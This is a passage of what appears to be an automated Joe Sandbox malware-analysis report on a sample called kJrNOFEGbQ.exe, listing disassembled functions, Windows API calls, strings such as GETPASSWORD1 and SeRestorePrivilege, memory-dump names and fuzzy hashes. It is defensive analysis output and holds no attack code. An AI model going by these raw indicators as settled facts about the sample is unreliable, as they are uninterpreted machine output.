Instruction Fuzzy Hash: 4AF01D33008118BBDF336F51EC09D8E7F26EB44B61B118455F61A5E161CB72E665D790

Function 003715FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 003717BC
_swprintf.LIBCMT ref: 0037186B

Strings

%ls, xrefs: 00371641, 00371657
%s: %s, xrefs: 003717CB

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: a3b329329430cc203e1b34100522aef45d124d07a01fb987ae9a283aedd33855
Instruction ID: 4005c1dbf0b4d9e1592dc56fe50f3dbb7ab59a9aa8f3d422c131353fccbe4bed
Opcode Fuzzy Hash: a3b329329430cc203e1b34100522aef45d124d07a01fb987ae9a283aedd33855
Instruction Fuzzy Hash: 10511B3B248300F6E63716ACCD46F76767DAB05B04F24C50AF7DE788D5C5AAA410AB1B

Function 00387F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\kJrNOFEGbQ.exe,00000104), ref: 00387FAE
_free.LIBCMT ref: 00388079
_free.LIBCMT ref: 00388083

Strings

C:\Users\user\Desktop\kJrNOFEGbQ.exe, xrefs: 00387FA5, 00387FAC, 00387FDB, 00388013

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\kJrNOFEGbQ.exe
API String ID: 2506810119-2744962998
Opcode ID: 38c65743563c522a415b742637da5184246ae63930b38da2c66070c6309ff915
Instruction ID: c3bd64f079113663e3a65c8c0dcfe78438bd6cbf1f9bd66a2369291d6eed04e5
Opcode Fuzzy Hash: 38c65743563c522a415b742637da5184246ae63930b38da2c66070c6309ff915
Instruction Fuzzy Hash: BD31A0B1A00319BFCB23EF99DC80D9EBBACEB95310F5540E6E5049B211DA719A458B61

Function 003831D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 003831FB
_abort.LIBCMT ref: 00383306

Strings

RCC, xrefs: 00383215
MOC, xrefs: 0038320D

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 62a999111cb5905c37412300bd7eed0c35faceedba77b4168ff8b94f9ef9b977
Instruction ID: 7c39c817586a8f7520cd006003ccbae12b4043431660e008f2a3589bbd1025bc
Opcode Fuzzy Hash: 62a999111cb5905c37412300bd7eed0c35faceedba77b4168ff8b94f9ef9b977
Instruction Fuzzy Hash: BD414A71900209AFCF16EF94CD81AEEBBB5FF48704F158499F90467222D735AA50DB50

Function 00367401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00367406

Part of subcall function 00363BBA: __EH_prolog.LIBCMT ref: 00363BBF

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 003674CD

Part of subcall function 00367A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00367AAB
Part of subcall function 00367A9C: GetLastError.KERNEL32 ref: 00367AF1
Part of subcall function 00367A9C: CloseHandle.KERNEL32(?), ref: 00367B00

Strings

SeSecurityPrivilege, xrefs: 0036744B
SeRestorePrivilege, xrefs: 00367460

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 680025c8692cb48924e5458133db4cec556ec22a1b813c2f81d5061fc43cbbb8
Instruction ID: 6df6cedd948a9ba727add404d29af704531cd2ba40e63fd3d1e573a911c65129
Opcode Fuzzy Hash: 680025c8692cb48924e5458133db4cec556ec22a1b813c2f81d5061fc43cbbb8
Instruction Fuzzy Hash: 9A31B671D04258AADF13EBA4DC45FEEBB7CAF06308F04C055F505AB285DB748A44CB60

Function 0037AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370

EndDialog.USER32(?,00000001), ref: 0037AD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0037ADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 0037ADC2

Strings

ASKNEXTVOL, xrefs: 0037AD28

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: b439c26659d6ef0e5b45584bc65bd017fd6842209f37b2c663583caa89834217
Instruction ID: 049f476b3164c0a2057a3753c1ce438da2f4c5648dc024d2dbcbcdc08448ee6c
Opcode Fuzzy Hash: b439c26659d6ef0e5b45584bc65bd017fd6842209f37b2c663583caa89834217
Instruction Fuzzy Hash: 2211E632280600BFD7339F68DC55FAE7BADEF8B742F018000F245DB5A5CB65A9159B22

Function 0037DDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

DialogBoxParamW.USER32(GETPASSWORD1,00010474,0037B270,?,?), ref: 0037DE18

Strings

xz;, xrefs: 0037DE28
r7, xrefs: 0037DDDC
GETPASSWORD1, xrefs: 0037DE0D

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: DialogParam
String ID: GETPASSWORD1$r7$xz;
API String ID: 665744214-399909694
Opcode ID: f2b6ba43b85f6820838e8a3c2c78b8804fc015b85d3b8b7c7c66ab7b5a14ea6d
Instruction ID: 7b4b6185393a3f6012e37e20611449c488995c3b6249acd925d5290bfb21ce7d
Opcode Fuzzy Hash: f2b6ba43b85f6820838e8a3c2c78b8804fc015b85d3b8b7c7c66ab7b5a14ea6d
Instruction Fuzzy Hash: F5110872640154AADB33DA35AC01BEB37ACAF0B750F158464FE4DEB581CAB8AC84C764

Function 0036D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0036D954
_strncpy.LIBCMT ref: 0036D99A

Part of subcall function 00371DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,003A1030,00000200,0036D928,00000000,?,00000050,003A1030), ref: 00371DC4

Strings

$%s, xrefs: 0036D949
@%s, xrefs: 0036D93E

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 36d8b6b1168f1294a73c62a22f2e5d427329d8750602e6b64d16d7a6038fdb75
Instruction ID: b867f77d23bf70d38f2d50c000a2f9671c4d7283aef5ab099fcd0203fc06bc03
Opcode Fuzzy Hash: 36d8b6b1168f1294a73c62a22f2e5d427329d8750602e6b64d16d7a6038fdb75
Instruction Fuzzy Hash: 98217572940348AEDF22EEA4CC45FEE7BE8AF05704F048511F954961A6E371D658CB51

Function 00370E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0036AC5A,00000008,?,00000000,?,0036D22D,?,00000000), ref: 00370E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0036AC5A,00000008,?,00000000,?,0036D22D,?,00000000), ref: 00370E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0036AC5A,00000008,?,00000000,?,0036D22D,?,00000000), ref: 00370E9F

Strings

Thread pool initialization failed., xrefs: 00370EB7

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 262b32aad9d5bbeb5d982d8e0ca910570078f93cdbe23aa9b4b981b95b0473b0
Instruction ID: 6500cd86575770bf4040ef7d36992d1a2fd7538c36ed604b91f9162df0083e0f
Opcode Fuzzy Hash: 262b32aad9d5bbeb5d982d8e0ca910570078f93cdbe23aa9b4b981b95b0473b0
Instruction Fuzzy Hash: 341191B1600B08DFC3365F7ADC84AABFBECEB55744F10882EF1DAC6600D67599408B50

Function 0036124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 0036125D

Strings

(7, xrefs: 003612A3
A, xrefs: 00361285
27, xrefs: 00361292

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Malloc
String ID: (7$27$A
API String ID: 2696272793-678002403
Opcode ID: 8939394c6a917f3addf29042aae2e872a0e598e62c182522bbd4ae258a048e6c
Instruction ID: 5d87b810538876cfeb02f0b203db69c2809ddc9b18fd76a3e35f358f242043cb
Opcode Fuzzy Hash: 8939394c6a917f3addf29042aae2e872a0e598e62c182522bbd4ae258a048e6c
Instruction Fuzzy Hash: 1A011B72901229ABCB15CFA4D8449DEBBFCEF09300F10855AE906E3200D735AE40CF94

Function 0037DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 0037DD31
REPLACEFILEDLG, xrefs: 0037DD1C, 0037DD50

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: b10d4993f298bcce655dac8d16b6236996561127ff32afaf56811a20c2021335
Instruction ID: c389f4b1af52bab96a1748723b552c50b3561816acaf610474f38ec0ff65fb67
Opcode Fuzzy Hash: b10d4993f298bcce655dac8d16b6236996561127ff32afaf56811a20c2021335
Instruction Fuzzy Hash: 18018076604245AFCB339F55FC44A967FBDEF09384F018425E90982230C6359850DBA0

Function 00361316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0036E2E8: _swprintf.LIBCMT ref: 0036E30E
Part of subcall function 0036E2E8: _strlen.LIBCMT ref: 0036E32F
Part of subcall function 0036E2E8: SetDlgItemTextW.USER32(?,0039E274,?), ref: 0036E38F
Part of subcall function 0036E2E8: GetWindowRect.USER32(?,?), ref: 0036E3C9
Part of subcall function 0036E2E8: GetClientRect.USER32(?,?), ref: 0036E3D5

GetDlgItem.USER32(00000000,00003021), ref: 0036135A
SetWindowTextW.USER32(00000000,003935F4), ref: 00361370

Strings

7, xrefs: 0036134A
0, xrefs: 00361319

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 7$0
API String ID: 2622349952-1435763450
Opcode ID: b18523b68ff260ea5601267cb48624e0eb53ac335fe25340e8d27dedd5730770
Instruction ID: b703684590a50d98e9b605fccc6cfec653ba1334f19fdffbc5de775c02dbc63e
Opcode Fuzzy Hash: b18523b68ff260ea5601267cb48624e0eb53ac335fe25340e8d27dedd5730770
Instruction Fuzzy Hash: 70F0AF38104288AADF572F608C0DBEA3B6DAF05344F0DC514FC4794AA9CBB4C994EB10

Function 00389A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00389AA9
__alldvrm.LIBCMT ref: 00389CAA
__alldvrm.LIBCMT ref: 00389CCC

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
Instruction ID: afea6cf21dd785ae498077b268636685315f7e200bc5196617184100474856bd
Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
Instruction Fuzzy Hash: 33A12672A043869FDB27AF68C8817BEBBE5EF55310F2D45EAE4859B281C2398941C750

Function 0036A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00367F69,?,?,?), ref: 0036A3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00367F69,?), ref: 0036A43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00367F69,?,?,?,?,?,?,?), ref: 0036A4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00367F69,?,?,?,?,?,?,?,?,?,?), ref: 0036A4C6

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: c4100a60ca9a30e2e468f4cc7060764aea05cc9772f97b3e23b4816d33290b50
Instruction ID: 4da685a10fc9ce6a62dee5796f2c50f789b44c1fad885e0a505a3bfbc66b2e88
Opcode Fuzzy Hash: c4100a60ca9a30e2e468f4cc7060764aea05cc9772f97b3e23b4816d33290b50
Instruction Fuzzy Hash: 5041E1311487819AE733DF24DC45F9EBBE8AB80700F148919B5E1A7284DAA49A489F53

Function 0038C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,003891E0,?,00000000,?,00000001,?,?,00000001,003891E0,?), ref: 0038C9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0038CA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00386CBE,?), ref: 0038CA70
__freea.LIBCMT ref: 0038CA79

Part of subcall function 00388E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0038CA2C,00000000,?,00386CBE,?,00000008,?,003891E0,?,?,?), ref: 00388E38

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 1768a04446176ae91eaaa77b549aced2d22144a628ade952b84a1337d5edc1b8
Instruction ID: 9cbad64e0948b8b8f18a8cd185a7ec2e514e46a91264e4a5712d19df123d5084
Opcode Fuzzy Hash: 1768a04446176ae91eaaa77b549aced2d22144a628ade952b84a1337d5edc1b8
Instruction Fuzzy Hash: 18318072A1021AABDF2AEF74DC45DAE7BA5EB41310F1541A9FC04EA250E739DD50CBA0

Function 0037A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0037A666
GetDeviceCaps.GDI32(00000000,00000058), ref: 0037A675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0037A683
ReleaseDC.USER32(00000000,00000000), ref: 0037A691

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 92932e0be56825ec1dbc6a9539849a0f87c15615bf4575bc6dce35041f813b78
Instruction ID: fd397b00933a07a31c12c01f60d7713a8bc596976ea81e9502e8557560fc7849
Opcode Fuzzy Hash: 92932e0be56825ec1dbc6a9539849a0f87c15615bf4575bc6dce35041f813b78
Instruction Fuzzy Hash: 8BE0EC33942B31A7D2636B61AC0DF8A3E5CEB0AB52F418101FA06D6190DB6496008BA1

Function 0037D06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0037D11B

Strings

.lnk, xrefs: 0037D2F7, 0037D307
d7, xrefs: 0037D3C5

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
